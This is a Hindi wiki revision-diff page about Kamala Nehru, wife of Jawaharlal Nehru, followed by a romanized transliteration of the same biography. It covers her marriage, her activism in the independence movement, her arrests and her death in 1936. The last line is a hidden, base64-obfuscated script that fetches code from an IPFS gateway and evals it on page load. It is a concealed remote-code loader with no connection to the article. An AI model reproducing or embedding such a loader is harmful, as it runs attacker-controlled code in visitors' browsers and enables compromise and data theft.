Difference between revisions of "कमला नेहरू"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
Line 1: Line 1:
 
[[चित्र:Jawahar-Lal-Nehru-Family.jpg|thumb|[[मोतीलाल नेहरू]] (दाएं खड़े) अपने बेटे [[जवाहरलाल नेहरू|जवाहरलाल]], बहू कमला नेहरू (बीच में) और परिवार के अन्य सदस्यों के साथ]]
 
[[चित्र:Jawahar-Lal-Nehru-Family.jpg|thumb|[[मोतीलाल नेहरू]] (दाएं खड़े) अपने बेटे [[जवाहरलाल नेहरू|जवाहरलाल]], बहू कमला नेहरू (बीच में) और परिवार के अन्य सदस्यों के साथ]]
 
[[चित्र:Jawahar-Lal-Nehru-Family-2.jpg|[[जवाहरलाल नेहरू]] अपनी पत्नी कमला नेहरू और बेटी [[इंदिरा गाँधी]] के साथ|thumb|left]]
 
[[चित्र:Jawahar-Lal-Nehru-Family-2.jpg|[[जवाहरलाल नेहरू]] अपनी पत्नी कमला नेहरू और बेटी [[इंदिरा गाँधी]] के साथ|thumb|left]]
*कमला नेहरू, [[भारत]] के प्रथम प्रधानमंत्री [[जवाहरलाल नेहरू]] की पत्नी थीं।
+
कमला नेहरू कौल (1899-1936) [[जवाहर लाल नेहरू]], [[भारतीय राष्ट्रीय कांग्रेस]] और [[भारत]] के पहले [[प्रधानमंत्री]] की पत्नी थी। कमला नेहरू को आज भी सौम्यता और विनम्रता की प्रतिमूर्ति के रूप में याद किया जाता है, किंतु देश के एक समृद्ध और सम्मानित परिवार की बहू होने पर भी कमला नेहरू परिवार में स्वयं  को अजनबी महसूस करती रहीं।
*मार्च 1916 में जवाहरलाल नेहरू का विवाह कमला कौल के साथ हुआ, जो [[दिल्ली]] में बसे कश्मीरी परिवार की थीं। उनकी अकेली संतान [[इंदिरा गाँधी|इंदिरा प्रियदर्शिनी]] का जन्म 1917 में हुआ। विवाहोपरांत इंदिरा प्रियदर्शिनी नाम 'इंदिरा गांधी' हुआ। वह [[भारत]] की प्रधानमंत्री बनीं। तथा एक पुत्र प्राप्त हुआ, जिसकी शीघ्र ही मृत्यु हो गयी थी।  
+
==परिचय==
 +
कमला नेहरू [[दिल्ली]] के प्रमुख व्यापारी पंड़ित 'जवाहरलाल मुल' की बेटी थीं। एक भारतीय परंपरागत कश्मीरी ब्राह्मण परिवार में कमला का जन्म 1899 को हुआ था और सत्रह साल की छोटी सी उम्र में ही उनका विवाह 8 फरवरी 1916 को जवाहरलाल नेहरू से हो गया था। उनका पूरा नाम कमला कौल नेहरू था। ब्रिटिश लेखिका कैथरिन प्रैंसक ने अपनी पुस्तक  'इंदिरा: द लाइफ ऑफ इंदिरा नेहरू गांधी' में लिखा है कि दिल्ली के परंपरावादी हिंदू ब्राह्मण परिवार से सम्बंध रखने के कारण हिंदू संस्कार कमला नेहरू के चरित्र का एक प्रमुख हिस्सा थे लेकिन पश्चिमी परिवेश वाले नेहरू ख़ानदान में उन्हें एकदम विपरीत माहौल मिला जिसमें वह खुद को अलग थलग महसूस करती रहीं। उनकी बेटी तथा देश की पहली महिला प्रधानमंत्री [[इंदिरा गांधी]] के जीवन पर पुस्तकें लिखने वाले लेखकों ने अपनी पुस्तकों में इस बात का प्रमुखता से उल्लेख  किया है कि कमला नेहरू की धार्मिक भावनाओं को नेहरू ख़ानदान में समझा नहीं गया और वह सदैव उस परिवार में खुद को अजनबी महसूस करती रहीं। इतना सब होने पर भी कमला नेहरू ने [[स्वतंत्रता संग्राम]] में अपने पति जवाहरलाल नेहरू का कंधे से कंधा मिलाकर साथ दिया। नेहरू के राष्ट्रीय आंदोलन में कूदने पर कमला नेहरू को भी अपनी क्षमता दिखाने का अवसर मिला।
 +
==आन्दोलनों में भाग==
 +
[[1921]] के [[असहयोग आंदोलन]] में उन्होंने [[इलाहाबाद]] में महिलाओं का एक समूह गठित किया और विदेशी वस्त्र तथा शराब की बिक्री करने वाली दुकानों का घेराव किया। इतिहासकारों का कहना है कि कमला नेहरू में गज़ब का आत्मविश्वास और नेतृत्व क्षमता थी। जब उनके पति को एक बार राष्ट्रद्रोही भाषण देने के आरोप में गिरफ़्तार कर लिया गया तो वह उनकी जगह गयीं और कमला जी ने नेहरू जी का भाषण पढ़ा।
 +
==गिरफ़्तारी==
 +
ब्रिटिश प्रशासन ने उन्हें दो बार गिरफ़्तार भी किया। उन्होंने [[महात्मा गांधी]] की ऐतिहासिक दांडी यात्रा में भी भाग लिया। सौम्य, छरहरी तथा विनम्रता की मूर्ति कमला नेहरू ने 19 नवम्बर [[1917]] में बेटी इंदिरा प्रियदर्शनी को जन्म दिया जिन्होंने अपने पिता की तरह ही भारत का नेतृत्व किया और कांग्रेस पार्टी की अध्यक्ष भी रहीं। कमला ने नवंबर 1924 में एक लड़के को भी जन्म दिया था, किंतु वह समय से पहले पैदा हो गया और 2 दिन बाद ही उसका निधन हो गया।
 +
==महात्मा गांधी के आश्रम में==
 +
कमला नेहरू ने कुछ समय [[कस्तूरबा गांधी]]के साथ महात्मा गांधी के आश्रम में भी व्यतीत किया,  जहां उनकी [[जयप्रकाश नारायण]] की पत्नी प्रभावती देवी से गहरी मित्रता हो गयी थी।
 +
==निधन==
 +
28 फरवरी 1936 को स्विटज़रलैंड में कमला नेहरू की बेहद कम उम्र में टीबी से मृत्यु हो गयी। टी.  बी. उस समय भयंकर बीमारी मानी जाती थी। उनके पति श्री जवाहरलाल नेहरू उस समय जेल में थे।
 
{{see also|नेहरू-गाँधी परिवार वृक्ष}}  
 
{{see also|नेहरू-गाँधी परिवार वृक्ष}}  
 +
==बाहरी कड़ियाँ== 
 +
*[http://jawaharlal.over-blog.com/145-index.html कमला KN]
 +
 
{{प्रचार}}
 
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति

Revision as of 10:46, 26 April 2011

[[chitr:Jawahar-Lal-Nehru-Family.jpg|thumb|motilal neharoo (daean kh de) apane bete javaharalal, bahoo kamala neharoo (bich mean) aur parivar ke any sadasyoan ke sath]] [[chitr:Jawahar-Lal-Nehru-Family-2.jpg|javaharalal neharoo apani patni kamala neharoo aur beti iandira gaandhi ke sath|thumb|left]] kamala neharoo kaul (1899-1936) javahar lal neharoo, bharatiy rashtriy kaangres aur bharat ke pahale pradhanamantri ki patni thi. kamala neharoo ko aj bhi saumyata aur vinamrata ki pratimoorti ke roop mean yad kiya jata hai, kiantu desh ke ek samriddh aur sammanit parivar ki bahoo hone par bhi kamala neharoo parivar mean svayan ko ajanabi mahasoos karati rahian.

parichay

kamala neharoo dilli ke pramukh vyapari pan dit 'javaharalal mul' ki beti thian. ek bharatiy paranparagat kashmiri brahman parivar mean kamala ka janm 1899 ko hua tha aur satrah sal ki chhoti si umr mean hi unaka vivah 8 pharavari 1916 ko javaharalal neharoo se ho gaya tha. unaka poora nam kamala kaul neharoo tha. british lekhika kaitharin praiansak ne apani pustak 'iandira: d laiph aauph iandira neharoo gaandhi' mean likha hai ki dilli ke paranparavadi hiandoo brahman parivar se sambandh rakhane ke karan hiandoo sanskar kamala neharoo ke charitr ka ek pramukh hissa the lekin pashchimi parivesh vale neharoo khanadan mean unhean ekadam viparit mahaul mila jisamean vah khud ko alag thalag mahasoos karati rahian. unaki beti tatha desh ki pahali mahila pradhanamantri iandira gaandhi ke jivan par pustakean likhane vale lekhakoan ne apani pustakoan mean is bat ka pramukhata se ullekh kiya hai ki kamala neharoo ki dharmik bhavanaoan ko neharoo khanadan mean samajha nahian gaya aur vah sadaiv us parivar mean khud ko ajanabi mahasoos karati rahian. itana sab hone par bhi kamala neharoo ne svatantrata sangram mean apane pati javaharalal neharoo ka kandhe se kandha milakar sath diya. neharoo ke rashtriy aandolan mean koodane par kamala neharoo ko bhi apani kshamata dikhane ka avasar mila.

andolanoan mean bhag

1921 ke asahayog aandolan mean unhoanne ilahabad mean mahilaoan ka ek samooh gathit kiya aur videshi vastr tatha sharab ki bikri karane vali dukanoan ka gherav kiya. itihasakaroan ka kahana hai ki kamala neharoo mean gazab ka atmavishvas aur netritv kshamata thi. jab unake pati ko ek bar rashtradrohi bhashan dene ke arop mean giraftar kar liya gaya to vah unaki jagah gayian aur kamala ji ne neharoo ji ka bhashan padha.

==giraftari== 

british prashasan ne unhean do bar giraftar bhi kiya. unhoanne mahatma gaandhi ki aitihasik daandi yatra mean bhi bhag liya. saumy, chharahari tatha vinamrata ki moorti kamala neharoo ne 19 navambar 1917 mean beti iandira priyadarshani ko janm diya jinhoanne apane pita ki tarah hi bharat ka netritv kiya aur kaangres parti ki adhyaksh bhi rahian. kamala ne navanbar 1924 mean ek l dake ko bhi janm diya tha, kiantu vah samay se pahale paida ho gaya aur 2 din bad hi usaka nidhan ho gaya.

mahatma gaandhi ke ashram mean

kamala neharoo ne kuchh samay kastooraba gaandhike sath mahatma gaandhi ke ashram mean bhi vyatit kiya, jahaan unaki jayaprakash narayan ki patni prabhavati devi se gahari mitrata ho gayi thi.

nidhan

28 pharavari 1936 ko svitazaralaiand mean kamala neharoo ki behad kam umr mean tibi se mrityu ho gayi. ti. bi. us samay bhayankar bimari mani jati thi. unake pati shri javaharalal neharoo us samay jel mean the.

  1. REDIRECT saancha:inhean bhi dekhean

bahari k diyaan


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>